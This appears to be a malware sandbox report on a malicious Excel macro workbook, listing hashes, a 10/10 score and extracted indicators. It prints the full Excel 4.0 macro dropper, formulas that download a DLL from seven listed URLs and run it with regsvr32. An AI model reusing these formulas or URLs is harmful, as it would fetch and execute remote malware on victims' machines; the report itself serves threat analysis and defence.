Overview

overview

10

Static

static

10

ae3819a4ba...5.xlsm

windows7-x64

10

ae3819a4ba...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ae3819a4ba22b646c34c63e28fe700ac9766246b0b594a264dad6c88f200cc65

  • Size

    20KB

  • Sample

    241120-py23ja1pdl

  • MD5

    c6d9f047b33b1b6d59e18af0d33abf4e

  • SHA1

    a0c0763daff91925dd9ddb9ccaaf551f92048043

  • SHA256

    ae3819a4ba22b646c34c63e28fe700ac9766246b0b594a264dad6c88f200cc65

  • SHA512

    0e1db2f266a86217b1261a65e188f4459844badeaece4212af587f3c3379a384e769aadb7a4339c306d02a6ff4a1b319b3d0753f437e24baaca6b6071aa5ea74

  • SSDEEP

    384:yHM0Vb1GNjDo4CGzPd6ZIwA1hKb5CzgObff9kC+xbX7qE7h:H0INfo4FLH2CBn9kC+xbLq+

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/

http://www.cafe-kwebbel.nl/layouts/3Wkev/

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/

http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/
xlm40.dropper

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/
xlm40.dropper

http://www.cafe-kwebbel.nl/layouts/3Wkev/
xlm40.dropper

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/
xlm40.dropper

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

Targets

    • Target

      ae3819a4ba22b646c34c63e28fe700ac9766246b0b594a264dad6c88f200cc65

    • Size

      20KB

    • MD5

      c6d9f047b33b1b6d59e18af0d33abf4e

    • SHA1

      a0c0763daff91925dd9ddb9ccaaf551f92048043

    • SHA256

      ae3819a4ba22b646c34c63e28fe700ac9766246b0b594a264dad6c88f200cc65

    • SHA512

      0e1db2f266a86217b1261a65e188f4459844badeaece4212af587f3c3379a384e769aadb7a4339c306d02a6ff4a1b319b3d0753f437e24baaca6b6071aa5ea74

    • SSDEEP

      384:yHM0Vb1GNjDo4CGzPd6ZIwA1hKb5CzgObff9kC+xbX7qE7h:H0INfo4FLH2CBn9kC+xbLq+

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks